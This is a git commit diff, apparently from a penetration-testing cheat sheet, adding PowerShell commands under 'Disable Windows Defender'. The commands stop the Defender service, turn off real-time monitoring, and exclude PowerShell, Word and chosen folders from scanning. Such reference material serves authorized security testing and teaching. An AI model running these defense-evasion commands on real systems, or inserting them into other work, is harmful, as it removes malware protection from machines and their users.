DSRM Admin

This commit is contained in:
Swissky
2021-01-08 23:41:50 +01:00
parent dd80fb899c
commit 3a6ac550b8
4 changed files with 43 additions and 10 deletions

View File

@@ -37,9 +37,15 @@
## Disable Windows Defender
```powershell
# Disable Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true
## Exclude a process / location
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\Video, C:\install
```
## Disable Windows Firewall